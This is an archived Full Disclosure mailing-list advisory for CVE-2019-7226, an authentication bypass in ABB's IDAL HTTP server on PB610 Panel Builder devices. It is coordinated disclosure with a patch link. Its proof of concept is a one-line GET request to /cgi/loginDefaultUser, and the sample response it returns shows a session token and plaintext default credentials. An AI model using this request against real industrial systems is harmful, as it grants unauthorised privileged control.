[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
From: xen1thLabs <xen1thLabs () darkmatter ! ae>
Date: 2019-06-20 12:13:19
Message-ID: 8d318fa8cd3c4cb78aab8ef00df89833 () darkmatter ! ae
[Download RAW message or body]
XL-19-010 - ABB IDAL HTTP Server Authentication Bypass Vulnerability
========================================================================
Identifiers
-----------
XL-19-010
CVE-2019-7226
ABBVU-IAMF-1902005
CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Affected vendor
---------------
ABB (new.abb.com)
Credit
------
Eldar Marcussen - xen1thLabs - Software Labs
Vulnerability summary
---------------------
The IDAL HTTP server CGI interface contains a URL, which allows an unauthenticated attacker to \
bypass authentication and gain access to privileged functions.
Technical details
-----------------
In the IDAL CGI interface, there is a URL (/cgi/loginDefaultUser), which will create a session \
in an authenticated state and return the session ID along with the username and plaintext \
password of the user. An attacker can then login with the provided credentials or supply the \
string 'IDALToken=......' in a cookie which will allow them to perform privileged operations \
such as restarting the service with /cgi/restart.
Proof of concept
----------------
```
GET http://localhost:81/cgi/loginDefaultUser
````
1
#S_OK
IDALToken=532c8632b86694f0232a68a0897a145c
admin
adminpass
Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367
Solution
--------
Apply the patches and instructions from vendor:
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch
Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic